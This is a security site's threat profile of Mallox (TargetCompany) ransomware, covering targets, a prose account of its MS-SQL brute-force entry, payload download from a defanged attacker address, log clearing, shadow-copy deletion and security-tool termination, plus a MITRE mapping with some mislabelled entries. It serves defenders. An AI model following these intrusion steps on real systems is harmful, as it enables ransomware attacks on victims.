Menu

  • Alerts
  • Incidents
  • News
  • APTs
  • Cyber Decoded
  • Cyber Hygiene
  • Cyber Review
  • Cyber Tips
  • Definitions
  • Malware
  • Threat Actors
  • Tutorials

Useful Tools

  • Password generator
  • Report an incident
  • Report to authorities
No Result
View All Result
CTF Hack Havoc
CyberMaterial
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
Hall of Hacks
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
No Result
View All Result
Hall of Hacks
CyberMaterial
No Result
View All Result
Home Malware

Mallox (TargetCompany) – Malware

July 22, 2024
Reading Time: 33 mins read
in Malware
Mallox (TargetCompany) – Malware

Mallox

Type of Malware

Ransomware

Country of Origin

Unknown

Date of initial activity

2021

Associated Groups

TargetCompany

Motivation

 Financial Gain

Attack Vectors

The group targets unsecured MS-SQL servers to infiltrate a network.

Tools

ChaCha20, AES-128, Curve25519

Targeted System

Windows

Overview

Mallox is a ransomware strain that targets Microsoft (MS) Windows systems. Active since June 2021, it is notable for exploiting unsecured MS-SQL servers as a penetration vector to compromise victims’ networks.
Increase in Activity
In 2023, Unit 42 researchers observed a significant uptick in Mallox ransomware activities, with an increase of almost 174% compared to the previous year. The attackers continued to exploit MS-SQL servers to distribute the ransomware. Unit 42 incident responders noted that Mallox ransomware uses brute forcing, data exfiltration, and tools such as network scanners.
Encryption Techniques
This ransomware employs a combination of different cryptographic algorithms, including ChaCha20, AES-128, and Curve25519. However, a decryptor for Mallox was released on February 7, 2022, by AVAST.

Targets

Worldwide victims, across multiple industries, including manufacturing, professional and legal services, and wholesale and retail.

How they operate

Initial Access
Since its emergence in 2021, the Mallox group has consistently targeted unsecured MS-SQL servers to infiltrate networks. These attacks begin with a dictionary brute force attack, trying a list of known or commonly used passwords against the MS-SQL servers. Attack Execution After gaining access, the attackers use command line and PowerShell to download the Mallox ransomware payload from a remote server. The command line performs the following actions: Download Ransomware Payload: Downloads the ransomware payload from hxxp://80.66.75[.]36/aRX.exe, saving it as tzt.exe. Runs a PowerShell script named updt.ps1. Payload Actions: Downloads another file named system.bat, saving it as tzt.bat. The tzt.bat file creates a user named SystemHelp and enables the remote desktop (RDP) protocol. Executes the ransomware payload tzt.exe using Windows Management Instrumentation (WMI).
Ransomware Execution
Before encryption takes place, the ransomware payload attempts multiple actions to ensure successful execution: Stop and Remove SQL-related Services: Uses sc.exe and net.exe to stop and remove SQL-related services, enabling access to and encryption of the victim’s file data. Delete Volume Shadows: Makes it harder to restore files once they are encrypted. Clear Event Logs: Uses Microsoft’s wevtutil command line utility to clear the application, security, setup, and system event logs, thwarting detection and forensic analysis efforts. Modify File Permissions: Uses the Windows built-in takeown.exe command to modify file permissions, denying access to cmd.exe and other key system processes. Disable System Image Recovery: Prevents the system administrator from manually loading the System Image Recovery feature using bcdedit.exe. Terminate Security-related Processes: Uses taskkill.exe to terminate security-related processes and services, evading security solutions. Bypass Anti-ransomware Products: Attempts to bypass the Raccine anti-ransomware product, if present, by deleting its registry key.
Ransom Note
Mallox leaves a ransom note in every directory on the victim’s drive. This ransom note explains the infection and provides contact information for the attackers.

MITRE tactics and techniques

Initial Access:
  • Exploit Public-Facing Application (T1190)
  • External Remote Services (T1133)
Execution:
  • Command and Scripting Interpreter (T1059)
  • PowerShell (T1086)
Persistence:
  • Service Execution (T1569)
  • Scheduled Task (T1053)
Privilege Escalation:
  • Exploitation for Privilege Escalation (T1068)
Defense Evasion:
  • Obfuscated Files or Information (T1027)
  • Deobfuscate/Decode Files or Information (T1140)
  • Masquerading (T1036)
  • Process Injection (T1055)
  • Timestomp (T1070.003)
Credential Access:
  • Credential Dumping (T1003)
  • Brute Force (T1110)
Discovery:
  • System Information Discovery (T1082)
  • Query Registry (T1012)
  • File and Directory Discovery (T1083)
Lateral Movement:
  • Remote Services (T1021)
  • SMB/Windows Admin Shares (T1021.002)
Collection:
  • Data from Local System (T1005)
Exfiltration:
  • Data Encrypted for Impact (T1486)
Impact:
  • Data Encrypted for Impact (T1486)
References:
  • Threat Group Assessment: Mallox RansomwareFake Update Utilizes New IDAT Loader To Execute StealC and Lumma Infostealers
  • Analysis of TargetCompany’s Attacks Against MS-SQL Servers (Mallox, BlueSky Ransomware)
  • Threat Group Assessment: Mallox Ransomware
  • Analysis of TargetCompany’s Attacks Against MS-SQL Servers (Mallox, BlueSky Ransomware)
Tags: AvastMalloxMalwareMicrosoftMS SQLPowerShellRansomwareTargetCompanyWindowsWorldwide
ADVERTISEMENT

Related Posts

Iranian Phishing Campaign (Scam) – Malware

Iranian Phishing Campaign (Scam) – Malware

March 2, 2025
Fake WalletConnect (Infostealer) – Malware

Fake WalletConnect (Infostealer) – Malware

March 2, 2025
SilentSelfie (Infostealer) – Malware

SilentSelfie (Infostealer) – Malware

March 2, 2025
Sniper Dz (Scam) – Malware

Sniper Dz (Scam) – Malware

March 2, 2025
TikTok Malware Scam (Trojan) – Malware

TikTok Malware Scam (Trojan) – Malware

March 2, 2025
Zombinder (Exploit Kit) – Malware

Zombinder (Exploit Kit) – Malware

March 2, 2025

Latest Alerts

New ZeroCrumb Malware Steals Browser Cookies

TikTok Videos Spread Vidar StealC Malware

CISA Commvault ZeroDay Flaw Risks Secrets

GitLab Patch Stops Service Disruption Risks

3AM Ransomware Email Bomb and Vishing Threat

Function Confusion Hits Serverless Clouds

Subscribe to our newsletter

    Latest Incidents

    Cetus Crypto Exchange Hacked For $223M

    MCP Data Breach Hits 235K NC Lab Patients

    UFCW Data Breach Risks Social Security Data

    Cyberattack Paralyzes French Hauts de Seine

    Santa Fe City Loses $324K In Hacker Scam

    Belgium Housing Hit by Ransomware Attack

    CyberMaterial Logo
    • About Us
    • Contact Us
    • Jobs
    • Legal and Privacy Policy
    • Site Map

    © 2025 | CyberMaterial | All rights reserved

    Welcome Back!

    Login to your account below

    Forgotten Password?

    Retrieve your password

    Please enter your username or email address to reset your password.

    Log In

    Add New Playlist

    No Result
    View All Result
    • Alerts
    • Incidents
    • News
    • Cyber Decoded
    • Cyber Hygiene
    • Cyber Review
    • Definitions
    • Malware
    • Cyber Tips
    • Tutorials
    • Advanced Persistent Threats
    • Threat Actors
    • Report an incident
    • Password Generator
    • About Us
    • Contact Us
    • Advertise with us

    Copyright © 2025 CyberMaterial